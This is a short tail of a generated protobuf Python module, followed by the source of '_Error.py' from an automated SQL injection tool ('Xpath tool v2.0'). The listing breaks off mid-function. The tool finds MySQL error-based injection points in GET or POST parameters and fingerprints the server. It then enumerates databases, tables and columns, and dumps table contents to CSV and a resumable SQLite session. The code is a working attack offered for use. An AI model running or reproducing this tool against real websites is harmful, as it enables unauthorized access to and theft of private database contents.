}, 1, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.ListDirResponse'
if _extension_runtime:
pass
__all__ = ['FileServiceErrors','KeyValue','KeyValues','FileContentType','CreateRequest_Parameter','CreateRequest','CreateResponse','OpenRequest','OpenResponse','CloseRequest','CloseResponse','FileStat','StatRequest','StatResponse','AppendRequest','AppendResponse','DeleteRequest','DeleteResponse','ReadRequest','ReadResponse','ReadKeyValueRequest','ReadKeyValueResponse_KeyValue','ReadKeyValueResponse','ShuffleEnums','ShuffleInputSpecification','ShuffleOutputSpecification','ShuffleRequest_Callback','ShuffleRequest','ShuffleResponse','GetShuffleStatusRequest','GetShuffleStatusResponse','GetCapabilitiesRequest','GetCapabilitiesResponse','FinalizeRequest','FinalizeResponse','GetDefaultGsBucketNameRequest','GetDefaultGsBucketNameResponse','ListDirRequest','ListDirResponse']
| bsd-3-clause | 3,129,811,020,666,528,000 | 26.029385 | 777 | 0.638449 | false |
hackersql/sq1map | Web/xpath_injection/Xpath/Xtract/_Error.py | 1 | 81246 | #!/usr/bin/python
#######################################################
# Xpath tool v2.0 - Automated Xpath Sql Injection #
# Author: Nasir khan (r0ot h3x49) #
#######################################################
import os, re
from Payload.ErrorPayloads import *
from _compat import (
compat_request,
compat_urlerr,
compat_urlopen,
compat_httperr,
compat_urlparse,
compat_opener,
compat_prettytable,
compat_timer,
compat_strftime,
compat_sleep,
compat_get,
compat_post,
user_agent_win,
user_agent_unix,
compat_color,
compat_product,
user_agent_default,
compat_user,
compat_exist,
compat_session,
compat_cursor,
compat_writer,
compat_timeout,
)
sqlite = compat_session()
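# Error-based extraction helper: each Xpath* method below injects a query in place
# of the 0x72306f74 marker, sends the request (GET or POST data), and reads the value
# the target leaks through MySQL's "Duplicate entry '~...1' for key 'group_key'" error.
# Recovered data is mirrored into the per-target SQLite session, log and CSV output.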
class ErrorBasedSQLi:
def __init__(self, url, data=None, timeout=None):
self._url = url
self._data = data
		# Session-resume flag: while False, new columns are added to the session table before results are stored
self._session = False
self._timeout = timeout
# Files and directories to Create
self._LFile = 'log'
self._dirXpath = '.Xpath'
self._dirOutput = 'output'
self._PFile = 'target.txt'
self._SFile = 'session.sqlite'
self._target = (compat_urlparse(self._url)).netloc
# Global paths to the Session, logs, and payload file
self._PathSession = ''
self._PathLogs = ''
self._PathPloads = ''
self._tgt = ''
self._PathDbdump = ''
self._dbdirectory = ''
		# SQLite session-table names and column DDL fragments used to create/alter the session DB
# Table Name
self.tblSession = "`tblSession`"
# Column Name
self.colPrm = "`Param` TEXT"
self.colTyp = "`Type` TEXT"
self.colTit = "`Title` TEXT"
self.colPld = "`Payload` TEXT"
self.colCdb = "`Database` TEXT"
self.colVer = "`Version` TEXT"
self.colUsr = "`User` TEXT"
self.colHst = "`Host` TEXT"
self.tblPayload = "`tblPayload`"
self.colDbp = "`PayloadDbs` TEXT"
self.colTbp = "`PayloadTbls` TEXT"
self.colClp = "`PayloadCols` TEXT"
self.colDtp = "`PayloadDump` TEXT"
self.colDbc = "`DbsCount` TEXT"
self.colDbs = "`DbsNames` TEXT"
# Logs to save:
self._logs = ""
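	# Build the per-target output layout under the user's home directory
	# (~/.Xpath/output/<host>/ on POSIX, %USERPROFILE%\.Xpath\output\<host>\ on Windows)
	# and pre-create the log and target.txt files used below.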
def PathToSave(self):
if os.name == 'posix':
path = compat_user("~")
Xpath = str(path) + "/" + str(self._dirXpath)
Output = str(Xpath) + "/" + str(self._dirOutput)
target = str(Output) + "/" + str(self._target)
self._tgt = target
log = str(target) + "/" + str(self._LFile)
plod = str(target) + "/" + str(self._PFile)
if compat_exist(path):
try:
os.makedirs(target)
except Exception as e:
pass
if compat_exist(target):
logs = open(str(log), "a")
plods = open(str(plod), "a")
logs.close()
plods.close()
self._PathLogs = log
self._PathPloads = plod
else:
path = os.environ["USERPROFILE"]
Xpath = str(path) + "\\" + str(self._dirXpath)
Output = str(Xpath) + "\\" + str(self._dirOutput)
target = str(Output) + "\\" + str(self._target)
self._tgt = target
log = str(target) + "\\" + str(self._LFile)
plod = str(target) + "\\" + str(self._PFile)
if compat_exist(path):
try:
os.makedirs(target)
except Exception as e:
pass
if compat_exist(target):
logs = open(str(log), "a")
plods = open(str(plod), "a")
logs.close()
plods.close()
self._PathLogs = log
self._PathPloads = plod
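	# Banner/fingerprint step: tries each payload in Payloads until one triggers the
	# duplicate-entry error, prints the recovered value (version, current user, database
	# or host) and stores it in the session column passed in as Col.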
def XpathBasic(self, tgt, Table, Col, Name=None, Payloads=None):
_colAlter = Col
_tableSession = Table
Query_Test = False
if self._url and not self._data:
for QueryIndex in Payloads:
if not Query_Test:
QueryToTest = ('%s' % QueryIndex)
if '0x72306f74' in tgt:
FinalCountQuery_replaced = tgt.replace('0x72306f74', QueryToTest)
try:
							req = compat_request(FinalCountQuery_replaced, headers={'User-agent':user_agent_win if os.name == "nt" else user_agent_unix})
resp = compat_urlopen(req, timeout=self._timeout)
except Exception as e:
pass
else:
respdata = resp.read()
if "Duplicate entry '~" in respdata:
Query_Test = True
banner = respdata.split("Duplicate entry '~")[1].split("1' for key 'group_key'")[0]
if not self._session:
sqlite.SessionAlter(self._PathSession, _tableSession, Col=_colAlter)
print compat_color.fg + compat_color.sb + "[" + compat_strftime("%H:%M:%S")+"] [INFO] retrieved: %s" % (banner)
print compat_color.fg + compat_color.sb + "back-end DBMS: MySQL >= 5.1"
print compat_color.fg + compat_color.sb + "%s: '%s'" % (Name, banner)
self._logs += "back-end DBMS: MySQL >= 5.1\n"
self._logs += "%s: %s\n\n" % (Name, banner)
_data = "'%s'" % (banner)
sqlite.SessionUpdate(self._PathSession, _tableSession, Col=(_colAlter).replace(" TEXT",""), Data=_data)
if Query_Test:
# Writing the logs to logs file
with open(str(self._PathLogs), "a") as f:
f.write(str(self._logs))
f.close()
# cleaning logs
self._logs = ""
break
elif self._url and self._data:
for QueryIndex in Payloads:
if not Query_Test:
QueryToTest = ('%s' % QueryIndex)
if '0x72306f74' in tgt:
FinalCountQuery_replaced = tgt.replace('0x72306f74', QueryToTest)
try:
							req = compat_request(self._url, data=FinalCountQuery_replaced, headers={'User-agent':user_agent_win if os.name == "nt" else user_agent_unix})
resp = compat_urlopen(req, timeout=self._timeout)
except Exception as e:
pass
else:
respdata = resp.read()
if "Duplicate entry '~" in respdata:
Query_Test = True
banner = respdata.split("Duplicate entry '~")[1].split("1' for key 'group_key'")[0]
if not self._session:
sqlite.SessionAlter(self._PathSession, _tableSession, Col=_colAlter)
print compat_color.fg + compat_color.sb + "[" + compat_strftime("%H:%M:%S")+"] [INFO] retrieved: %s" % (banner)
print compat_color.fg + compat_color.sb + "back-end DBMS: MySQL >= 5.1"
print compat_color.fg + compat_color.sb + "%s: '%s'" % (Name, banner)
self._logs += "back-end DBMS: MySQL >= 5.1\n"
self._logs += "%s: %s\n\n" % (Name, banner)
_data = "'%s'" % (banner)
sqlite.SessionUpdate(self._PathSession, _tableSession, Col=(_colAlter).replace(" TEXT",""), Data=_data)
if Query_Test:
# Writing the logs to logs file
with open(str(self._PathLogs), "a") as f:
f.write(str(self._logs))
f.close()
# cleaning logs
self._logs = ""
break
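	# Enumeration step: walks LIMIT offsets init..total-1 with a single-value payload
	# (database, table or column names) and returns the comma-joined values, the payload,
	# the raw list and the expected count.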
def XpathDump(self, init, total, _payload):
# list for saving dumps
_dlist = []
_dumped = total
if self._url and not self._data:
			# Iterate over the requested row range (LIMIT offsets)
for itr in range(init, total):
# setting payload
if 'LIMIT/**_**/0' in _payload:
_dbsQuery = _payload.replace('LIMIT/**_**/0','LIMIT/**_**/%d' % (itr))
elif 'LIMIT%200' in _payload:
_dbsQuery = _payload.replace('LIMIT%200','LIMIT%%20%d' % (itr))
else:
_dbsQuery = _payload.replace('LIMIT+0','LIMIT+%d' % (itr))
try:
					req = compat_request(_dbsQuery, headers={'User-agent':user_agent_win if os.name == "nt" else user_agent_unix})
resp = compat_urlopen(req, timeout=self._timeout)
except Exception as e:
pass
except KeyboardInterrupt as e:
_clean = ','.join(map(str, _dlist))
return _clean, _payload, _dlist, _dumped
else:
respdata = resp.read()
if "Duplicate entry '~" in respdata:
_dbn = respdata.split("Duplicate entry '~")[1].split("1' for key 'group_key'")[0]
print compat_color.fg + compat_color.sb + "[" + compat_strftime("%H:%M:%S")+"] [INFO] retrieved: %s" % (_dbn)
_dlist.append(_dbn)
_clean = ','.join(map(str, _dlist))
return _clean, _payload, _dlist, _dumped
elif self._url and self._data:
for itr in range(init, total):
# setting payload
if 'LIMIT/**_**/0' in _payload:
_dbsQuery = _payload.replace('LIMIT/**_**/0','LIMIT/**_**/%d' % (itr))
elif 'LIMIT%200' in _payload:
_dbsQuery = _payload.replace('LIMIT%200','LIMIT%%20%d' % (itr))
else:
_dbsQuery = _payload.replace('LIMIT+0','LIMIT+%d' % (itr))
try:
					req = compat_request(self._url, data=_dbsQuery, headers={'User-agent':user_agent_win if os.name == "nt" else user_agent_unix})
resp = compat_urlopen(req, timeout=self._timeout)
except Exception as e:
pass
except KeyboardInterrupt as e:
_clean = ','.join(map(str, _dlist))
return _clean, _payload, _dlist, _dumped
else:
respdata = resp.read()
if "Duplicate entry '~" in respdata:
_dbn = respdata.split("Duplicate entry '~")[1].split("1' for key 'group_key'")[0]
print compat_color.fg + compat_color.sb + "[" + compat_strftime("%H:%M:%S")+"] [INFO] retrieved: %s" % (_dbn)
_dlist.append(_dbn)
_clean = ','.join(map(str, _dlist))
return _clean, _payload, _dlist, _dumped
def XpathDataDump(self, init, total, _payload, Table=None, Dbname=None, Coltodump=None, flag=True):
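		# XpathDataDump: dumps the given columns row by row. For every row index the LIMIT clause
		# of the payload is advanced and the 0x72306f74 marker is replaced with each column name
		# in turn; retrieved values are written to a per-table CSV file, inserted into the sqlite
		# session and collected in a prettytable, which is returned along with the payload.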
		# buffers for accumulating each dumped row
_info = ""
_innerCounter = 0
_colTabulate = [w.replace("`","") for w in Coltodump]
_tabulate = compat_prettytable(_colTabulate)
_tabulate.align = "l"
_tabulate.header = True
cols = " TEXT,".join(map(str, Coltodump))
ColsToCreate = "%s TEXT" % (cols)
ok = re.compile(r'[^\\/:*?"<>|("")$#!%]')
_db = Dbname
if compat_exist(self._tgt):
_directory = "%s" % (_db)
_db_directory = "%s/%s" % (self._tgt, _directory) if os.name is "posix" else "%s\\%s" % (self._tgt, _directory)
self._dbdirectory = "%s" % (_db_directory)
try:
os.makedirs(_db_directory)
except Exception as e:
pass
if compat_exist(self._dbdirectory):
_tbl_dump = "%s/%s" % (self._dbdirectory, Table.replace("`","")) if os.name is "posix" else "%s\\%s" % (self._dbdirectory, Table.replace("`",""))
try:
_csv_file = open("%s.csv" % (_tbl_dump), "ab")
except (Exception, IOError) as e:
					if "Permission denied" in str(e):
print '\n' + compat_color.fr + compat_color.sb + "[" + compat_strftime("%H:%M:%S")+"] [ERROR] Cannot write to '%s.csv' the file is already open please close it.." % (Table)
print compat_color.fw + compat_color.sn + "\n[*] shutting down at "+compat_strftime("%H:%M:%S")+"\n"
exit(0)
else:
_writer = compat_writer(_csv_file, dialect='excel')
if Table and flag:
sqlite.SessionCreate(self._PathSession, Table, Cols=ColsToCreate)
if self._url and not self._data:
						# Iterating through the number of entries to dump
for itr in range(init, total):
for col in Coltodump:
# setting payload
if 'LIMIT/**_**/0' in _payload:
_dbsQuery = _payload.replace('LIMIT/**_**/0','LIMIT/**_**/%d' % (itr))
elif 'LIMIT%200' in _payload:
_dbsQuery = _payload.replace('LIMIT%200','LIMIT%%20%d' % (itr))
else:
_dbsQuery = _payload.replace('LIMIT+0','LIMIT+%d' % (itr))
FinalCountQuery_replaced = _dbsQuery.replace("0x72306f74", "%s" % (col))
try:
req = compat_request(FinalCountQuery_replaced, headers={'User-agent':user_agent_win if os.name is "win32" else user_agent_unix})
resp = compat_urlopen(req, timeout=self._timeout)
except Exception as e:
_csv_file.close()
_dlist = str(_tabulate)
return _dlist, _payload
except KeyboardInterrupt as e:
_csv_file.close()
_dlist = str(_tabulate)
return _dlist, _payload
else:
respdata = resp.read()
if "Duplicate entry '~" in respdata:
_dbn = respdata.split("Duplicate entry '~")[1].split("1' for key 'group_key'")[0]
print compat_color.fg + compat_color.sb + "[" + compat_strftime("%H:%M:%S")+"] [INFO] retrieved: %s" % (_dbn)
_innerCounter += 1
if _dbn is not None:
_info += "%s," % (_dbn.strip().replace(",", "-") if "," in _dbn else _dbn)
if _innerCounter == len(Coltodump):
try:
_toSplit = "".join(x if ok.match(x) else "_" for x in _info)
_dumped = _toSplit[:-1].split(",")
_writer.writerow(_dumped)
_info = ""
_dt = ",".join(map(str, _dumped))
_data = '"%s"' % (_dt.replace(",", '","'))
sqlite.SessionInsert(self._PathSession, Table, Cols=(ColsToCreate).replace(" TEXT", ""), Data=_data)
_tabulate.add_row(_dumped)
_innerCounter = 0
except KeyboardInterrupt as e:
_csv_file.close()
_dlist = str(_tabulate)
return _dlist, _payload
_dlist = str(_tabulate)
_csv_file.close()
return _dlist, _payload
elif self._url and self._data:
						# Iterating through the number of entries to dump
for itr in range(init, total):
for col in Coltodump:
# setting payload
if 'LIMIT/**_**/0' in _payload:
_dbsQuery = _payload.replace('LIMIT/**_**/0','LIMIT/**_**/%d' % (itr))
elif 'LIMIT%200' in _payload:
_dbsQuery = _payload.replace('LIMIT%200','LIMIT%%20%d' % (itr))
else:
_dbsQuery = _payload.replace('LIMIT+0','LIMIT+%d' % (itr))
FinalCountQuery_replaced = _dbsQuery.replace("0x72306f74", "%s" % (col))
try:
req = compat_request(self._url, data=FinalCountQuery_replaced, headers={'User-agent':user_agent_win if os.name is "win32" else user_agent_unix})
resp = compat_urlopen(req, timeout=self._timeout)
except Exception as e:
_dlist = str(_tabulate)
return _dlist, _payload
except KeyboardInterrupt as e:
_dlist = str(_tabulate)
_csv_file.close()
return _dlist, _payload
else:
respdata = resp.read()
if "Duplicate entry '~" in respdata:
_dbn = respdata.split("Duplicate entry '~")[1].split("1' for key 'group_key'")[0]
print compat_color.fg + compat_color.sb + "[" + compat_strftime("%H:%M:%S")+"] [INFO] retrieved: %s" % (_dbn)
_innerCounter += 1
if _dbn is not None:
_info += "%s," % (_dbn.strip().replace(",", "-") if "," in _dbn else _dbn)
if _innerCounter == len(Coltodump):
try:
_toSplit = "".join(x if ok.match(x) else "_" for x in _info)
_dumped = _toSplit[:-1].split(",")
_writer.writerow(_dumped)
_info = ""
_dt = ",".join(map(str, _dumped))
_data = '"%s"' % (_dt.replace(",", '","'))
sqlite.SessionInsert(self._PathSession, Table, Cols=(ColsToCreate).replace(" TEXT", ""), Data=_data)
_tabulate.add_row(_dumped)
_innerCounter = 0
except KeyboardInterrupt as e:
_dlist = str(_tabulate)
_csv_file.close()
return _dlist, _payload
_dlist = str(_tabulate)
_csv_file.close()
return _dlist, _payload
	def XpathAdvance(self, flag, tgt, Col, Name=None, Payloads=None, total=None, Dbname=None, TblName=None, ColsList=None):
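		# XpathAdvance: two-stage extraction used for databases/tables/columns/dumps. The first
		# payload set (Payloads[0]) retrieves the entry count, the second (Payloads[1]) builds the
		# dump query, which is then handed to XpathDump or XpathDataDump; counts, names and the
		# working payload are persisted to the sqlite session so interrupted runs can be resumed.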
_tablePayload = self.tblPayload
_colUpdate = Col[0]
_tableSession = self.tblSession
_colAlterCount = Col[1]
_colAlterName = Col[2]
PayloadCount = Payloads[0]
PayloadDump = Payloads[1]
Query_Test = flag
if Name:
print compat_color.fg + compat_color.sn + "["+compat_strftime("%H:%M:%S")+"] [INFO] fetching %s" % (Name)
if self._url and not self._data:
for QueryIndex, inline_comment in compat_product(PayloadCount, (False, True)):
if not Query_Test:
QueryToTest = ('%s' % QueryIndex).replace(" " if inline_comment else "/**/","/**/")
if '0x72306f74' in tgt:
if Dbname and not TblName and not ColsList:
FinalCountQuery_replaced = tgt.replace('0x72306f74', QueryToTest % (Dbname.encode("hex", "strict")))
elif Dbname and TblName and not ColsList:
FinalCountQuery_replaced = tgt.replace('0x72306f74', QueryToTest % (Dbname.encode("hex", "strict"), TblName.encode("hex", "strict")))
elif Dbname and TblName and ColsList:
FinalCountQuery_replaced = tgt.replace('0x72306f74', QueryToTest % (Dbname, TblName))
else:
FinalCountQuery_replaced = tgt.replace('0x72306f74', QueryToTest)
try:
req = compat_request(FinalCountQuery_replaced, headers={'User-agent':user_agent_win if os.name is "win32" else user_agent_unix})
resp = compat_urlopen(req, timeout=self._timeout)
except Exception as e:
pass
else:
respdata = resp.read()
if "Duplicate entry '~" in respdata:
Query_Test = True
Count = respdata.split("Duplicate entry '~")[1].split("1' for key 'group_key'")[0]
if not self._session and int(Count) != 0:
sqlite.SessionAlter(self._PathSession, _tableSession, Col=_colAlterCount)
print compat_color.fg + compat_color.sd + "[" + compat_strftime("%H:%M:%S")+"] [INFO] the SQL query used returns %s entries" % (Count)
else:
print compat_color.fr + compat_color.sb + "[" + compat_strftime("%H:%M:%S")+"] [INFO] the SQL query used returns %s entries" % (Count)
print compat_color.fw + compat_color.sn + "\n[*] shutting down at "+compat_strftime("%H:%M:%S")+"\n"
exit(0)
_data = "'%s'" % (Count)
sqlite.SessionUpdate(self._PathSession, _tableSession, Col=(_colAlterCount).replace(" TEXT",""), Data=_data)
if Query_Test:
DQuery = False
for QueryIndex, inline_comment in compat_product(PayloadDump, (False, True)):
if not DQuery:
QueryToTest = ('%s' % QueryIndex).replace(" " if inline_comment else "/**/","/**/")
if '0x72306f74' in tgt:
if Dbname and not TblName and not ColsList:
FinalCountQuery_replaced = tgt.replace('0x72306f74', QueryToTest % (Dbname.encode("hex", "strict")))
elif Dbname and TblName and not ColsList:
FinalCountQuery_replaced = tgt.replace('0x72306f74', QueryToTest % (Dbname.encode("hex", "strict"), TblName.encode("hex", "strict")))
elif Dbname and TblName and ColsList:
FinalCountQuery_replaced = tgt.replace('0x72306f74', QueryToTest % (ColsList[0], Dbname, TblName))
else:
FinalCountQuery_replaced = tgt.replace('0x72306f74', QueryToTest)
try:
req = compat_request(FinalCountQuery_replaced, headers={'User-agent':user_agent_win if os.name is "win32" else user_agent_unix})
resp = compat_urlopen(req, timeout=self._timeout)
except Exception as e:
pass
else:
respdata = resp.read()
if "Duplicate entry '~" in respdata:
dbsName = respdata.split("Duplicate entry '~")[1].split("1' for key 'group_key'")[0]
DQuery = True
if not self._session:
sqlite.SessionAlter(self._PathSession, _tableSession, Col=_colAlterName)
if DQuery:
_init = 0
_total = int(Count) if not flag else int(total)
_payload = FinalCountQuery_replaced
if ColsList:
_pl = _payload.replace(ColsList[0], "0x72306f74")
__dlist, __ = self.XpathDataDump(_init, _total, _pl, Table=TblName, Dbname=Dbname,Coltodump=ColsList)
_dlist = "%s" % (__dlist)
_datapayload = '"%s"' % (_pl)
sqlite.SessionUpdate(self._PathSession, _tablePayload, Col=(_colUpdate).replace(" TEXT",""), Data=_datapayload)
return _dlist
else:
__names, _pl, __dlist, __dumped = self.XpathDump(_init, _total, _payload)
_data = '"%s"' % (__names)
_datapayload = '"%s"' % (_pl)
sqlite.SessionUpdate(self._PathSession, _tableSession, Col=(_colAlterName).replace(" TEXT",""), Data=_data)
sqlite.SessionUpdate(self._PathSession, _tablePayload, Col=(_colUpdate).replace(" TEXT",""), Data=_datapayload)
return __dlist, __dumped
break
elif self._url and self._data:
for QueryIndex, inline_comment in compat_product(PayloadCount, (False, True)):
if not Query_Test:
QueryToTest = ('%s' % QueryIndex).replace(" " if inline_comment else "/**/","/**/")
if '0x72306f74' in tgt:
if Dbname and not TblName and not ColsList:
FinalCountQuery_replaced = tgt.replace('0x72306f74', QueryToTest % (Dbname.encode("hex", "strict")))
elif Dbname and TblName and not ColsList:
FinalCountQuery_replaced = tgt.replace('0x72306f74', QueryToTest % (Dbname.encode("hex", "strict"), TblName.encode("hex", "strict")))
elif Dbname and TblName and ColsList:
FinalCountQuery_replaced = tgt.replace('0x72306f74', QueryToTest % (Dbname, TblName))
else:
FinalCountQuery_replaced = tgt.replace('0x72306f74', QueryToTest)
try:
req = compat_request(self._url, data=FinalCountQuery_replaced, headers={'User-agent':user_agent_win if os.name is "win32" else user_agent_unix})
resp = compat_urlopen(req, timeout=self._timeout)
except Exception as e:
pass
else:
respdata = resp.read()
if "Duplicate entry '~" in respdata:
Query_Test = True
Count = respdata.split("Duplicate entry '~")[1].split("1' for key 'group_key'")[0]
if not self._session and int(Count) != 0:
sqlite.SessionAlter(self._PathSession, _tableSession, Col=_colAlterCount)
print compat_color.fg + compat_color.sd + "[" + compat_strftime("%H:%M:%S")+"] [INFO] the SQL query used returns %s entries" % (Count)
else:
print compat_color.fr + compat_color.sb + "[" + compat_strftime("%H:%M:%S")+"] [INFO] the SQL query used returns %s entries" % (Count)
print compat_color.fw + compat_color.sn + "\n[*] shutting down at "+compat_strftime("%H:%M:%S")+"\n"
exit(0)
_data = "'%s'" % (Count)
sqlite.SessionUpdate(self._PathSession, _tableSession, Col=(_colAlterCount).replace(" TEXT",""), Data=_data)
if Query_Test:
DQuery = False
for QueryIndex, inline_comment in compat_product(PayloadDump, (False, True)):
if not DQuery:
QueryToTest = ('%s' % QueryIndex).replace(" " if inline_comment else "/**/","/**/")
if '0x72306f74' in tgt:
if Dbname and not TblName and not ColsList:
FinalCountQuery_replaced = tgt.replace('0x72306f74', QueryToTest % (Dbname.encode("hex", "strict")))
elif Dbname and TblName and not ColsList:
FinalCountQuery_replaced = tgt.replace('0x72306f74', QueryToTest % (Dbname.encode("hex", "strict"), TblName.encode("hex", "strict")))
elif Dbname and TblName and ColsList:
FinalCountQuery_replaced = tgt.replace('0x72306f74', QueryToTest % (ColsList[0], Dbname, TblName))
else:
FinalCountQuery_replaced = tgt.replace('0x72306f74', QueryToTest)
try:
req = compat_request(self._url, data=FinalCountQuery_replaced, headers={'User-agent':user_agent_win if os.name is "win32" else user_agent_unix})
resp = compat_urlopen(req, timeout=self._timeout)
except Exception as e:
pass
else:
respdata = resp.read()
if "Duplicate entry '~" in respdata:
dbsName = respdata.split("Duplicate entry '~")[1].split("1' for key 'group_key'")[0]
DQuery = True
if not self._session:
sqlite.SessionAlter(self._PathSession, _tableSession, Col=_colAlterName)
if DQuery:
_init = 0
_total = int(Count) if not flag else int(total)
_payload = FinalCountQuery_replaced
if ColsList:
_pl = _payload.replace(ColsList[0], "0x72306f74")
__dlist, __ = self.XpathDataDump(_init, _total, _pl, Table=TblName, Dbname=Dbname,Coltodump=ColsList)
_dlist = "%s" % (__dlist)
_datapayload = '"%s"' % (_pl)
sqlite.SessionUpdate(self._PathSession, _tablePayload, Col=(_colUpdate).replace(" TEXT",""), Data=_datapayload)
return _dlist
else:
__names, _pl, __dlist, __dumped = self.XpathDump(_init, _total, _payload)
_data = '"%s"' % (__names)
_datapayload = '"%s"' % (_pl)
sqlite.SessionUpdate(self._PathSession, _tableSession, Col=(_colAlterName).replace(" TEXT",""), Data=_data)
sqlite.SessionUpdate(self._PathSession, _tablePayload, Col=(_colUpdate).replace(" TEXT",""), Data=_datapayload)
return __dlist, __dumped
break
break
def XpathInject(self, flag, Col, Name=None, Payloads=None, TblName=None, Dbname=None, ColList=None):
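		# XpathInject: locates an error-based (FLOOR) injection point by iterating over
		# PREFIXES x TESTS x SUFIXES until the MySQL "Duplicate entry" signature appears in the
		# response. On success the injection details are written to the session tables and control
		# passes to XpathBasic (flag == 'basic') or XpathAdvance (advanced extraction).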
		# Counter for HTTP requests
HTTPReqCount = 0
_name = Name
# Table Session
_tableSession = self.tblSession
_colsSession = "%s, %s, %s, %s" % (self.colPrm, self.colTyp, self.colTit, self.colPld)
# Column to alter the Table Session
_colAlter = Col
# Table Payload
_tablePayload = self.tblPayload
_colsPayload = "%s,%s,%s,%s" % (self.colDbp, self.colTbp, self.colClp, self.colDtp)
		# GET-based injection (parameters carried in the URL)
if self._url and not self._data:
vul = False
for prefix, query, sufix, inline_comment in compat_product(PREFIXES, TESTS, SUFIXES, (False, True)):
try:
if not vul:
temp = ("%s%s%s" % (prefix, query, sufix)).replace(" " if inline_comment else "/**/","/**/")
if '*' in self._url:
first, last = self._url.split('*')
tgt = first + temp + last
else:
tgt = self._url + temp
try:
print compat_color.fg + compat_color.sn + "["+compat_strftime("%H:%M:%S")+"] [INFO] testing '" + compat_color.fg + compat_color.sn + TITLE + compat_color.fg + compat_color.sn + "'"
req = compat_request(tgt, headers={'User-agent': user_agent_win if os.name is "win32" else user_agent_unix})
HTTPReqCount += 1
resp = compat_urlopen(req, timeout=self._timeout)
except compat_urlerr as e:
pass
except compat_httperr as e:
pass
except Exception as e:
pass
except KeyboardInterrupt:
print '\n' + compat_color.fr + compat_color.sn + '['+compat_strftime("%H:%M:%S")+'] [ERROR] user aborted'
print compat_color.fw + compat_color.sn + "\n[*] shutting down at "+compat_strftime("%H:%M:%S")+"\n"
exit(0)
else:
respdata = resp.read()
if "Duplicate entry '~" in respdata:
vul = True
retVal = respdata.split("Duplicate entry '~")[1].split("1' for key 'group_key'")[0]
# Creating Tables
if not self._session:
sqlite.SessionCreate(self._PathSession, _tableSession, Cols=_colsSession)
sqlite.SessionCreate(self._PathSession, _tablePayload, Cols=_colsPayload)
print compat_color.fg + compat_color.sb + 'xpath identified the following injection point(s) with a total of %d HTTP(s) requests:' % HTTPReqCount
self._logs += 'xpath identified the following injection point(s) with a total of %d HTTP(s) requests:\n' % HTTPReqCount
print compat_color.fw + compat_color.sn + '---'
self._logs += '---\n'
print compat_color.fw + compat_color.sn + 'Parameter: (GET)'
self._logs += 'Parameter: (GET)\n'
print compat_color.fw + compat_color.sn + '\tType: error-based'
self._logs += '\tType: error-based\n'
print compat_color.fw + compat_color.sn + '\tTitle: %s' % TITLE
self._logs += '\tTitle: %s\n' % TITLE
print compat_color.fw + compat_color.sn + '\tPayload: %s' % tgt
self._logs += '\tPayload: %s\n' % tgt
print compat_color.fw + compat_color.sn + '---'
self._logs += '---\n'
# Initial Injection data insertion into the Tables
_data = '"GET", "error-based", "%s", "%s"' % (TITLE, tgt)
sqlite.SessionInsert(self._PathSession, _tableSession, Cols=(_colsSession).replace(" TEXT",""), Data=_data)
sqlite.SessionInsert(self._PathSession, _tablePayload, Cols=(_colsPayload).replace(" TEXT",""), Data=_data)
# web app response and web server response headers
war, wsr = resp.headers.get('X-Powered-By') , resp.headers.get('Server')
print compat_color.fw + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] the back-end DBMS is MySQL"
self._logs += "the back-end DBMS is MySQL\n"
if war and wsr:
print compat_color.fw + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] web application technology: %s, %s" % (war, wsr[0:14] if 'Apache' in wsr else wsr)
self._logs += "web application technology: %s, %s\n" % (war, wsr[0:14] if 'Apache' in wsr else wsr)
else:
print compat_color.fw + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] web server technology: %s" % (wsr)
self._logs += "web server technology: %s\n" % (wsr)
print compat_color.fg + compat_color.sd + "["+compat_strftime("%H:%M:%S")+"] [INFO] fetching %s" % (_name)
if vul:
# writing into the target.txt file (target, injection type)
w = "%s (%s)" % (self._url, "GET")
with open(str(self._PathPloads), "w") as fw:
fw.write(str(w))
fw.close()
# flag check for basic or advance extraction
if flag == 'basic':
# extracts basics (version, database, user, host)
self.XpathBasic(tgt, _tableSession, _colAlter, _name, Payloads)
else:
# extracts (dbs, tables, columns, dumps data from columns)
_flag = False
if Dbname and not TblName and not ColList:
__dlist, __dumped = self.XpathAdvance(_flag, tgt, _colAlter, Payloads=Payloads, Dbname=Dbname)
elif Dbname and TblName and not ColList:
__dlist, __dumped = self.XpathAdvance(_flag, tgt, _colAlter, Payloads=Payloads, Dbname=Dbname, TblName=TblName)
elif Dbname and TblName and ColList:
__dlist = self.XpathAdvance(_flag, tgt, _colAlter, Payloads=Payloads, Dbname=Dbname, TblName=TblName, ColsList=ColList)
_dlist = "%s" % (__dlist)
return _dlist
else:
__dlist, __dumped = self.XpathAdvance(_flag, tgt, _colAlter, Payloads=Payloads)
return __dlist, __dumped
break
except Exception as e:
if not vul:
continue
else:
break
elif self._url and self._data:
vul = False
for prefix, query, sufix, inline_comment in compat_product(PREFIXES, TESTS, SUFIXES, (False, True)):
try:
if not vul:
temp = ("%s%s%s" % (prefix, query, sufix)).replace(" " if inline_comment else "/**/","/**/")
if '*' in self._data:
first, last = self._data.split('*')
tgt = first + temp + last
else:
tgt = self._data + temp
try:
print compat_color.fg + compat_color.sn + "["+compat_strftime("%H:%M:%S")+"] [INFO] testing '" + compat_color.fg + compat_color.sn + TITLE + compat_color.fg + compat_color.sn + "'"
req = compat_request(self._url, data=tgt, headers={'User-agent': user_agent_win if os.name is "win32" else user_agent_unix})
HTTPReqCount += 1
resp = compat_urlopen(req, timeout=self._timeout)
except compat_urlerr as e:
pass
except compat_httperr as e:
pass
except Exception as e:
pass
except KeyboardInterrupt:
print '\n' + compat_color.fr + compat_color.sn + '['+compat_strftime("%H:%M:%S")+'] [ERROR] user aborted'
print compat_color.fw + compat_color.sn + "\n[*] shutting down at "+compat_strftime("%H:%M:%S")+"\n"
exit(0)
else:
respdata = resp.read()
if "Duplicate entry '~" in respdata:
vul = True
retVal = respdata.split("Duplicate entry '~")[1].split("1' for key 'group_key'")[0]
# Creating Tables
if not self._session:
sqlite.SessionCreate(self._PathSession, _tableSession, Cols=_colsSession)
sqlite.SessionCreate(self._PathSession, _tablePayload, Cols=_colsPayload)
print compat_color.fg + compat_color.sb + 'xpath identified the following injection point(s) with a total of %d HTTP(s) requests:' % HTTPReqCount
self._logs += 'xpath identified the following injection point(s) with a total of %d HTTP(s) requests:\n' % HTTPReqCount
print compat_color.fw + compat_color.sn + '---'
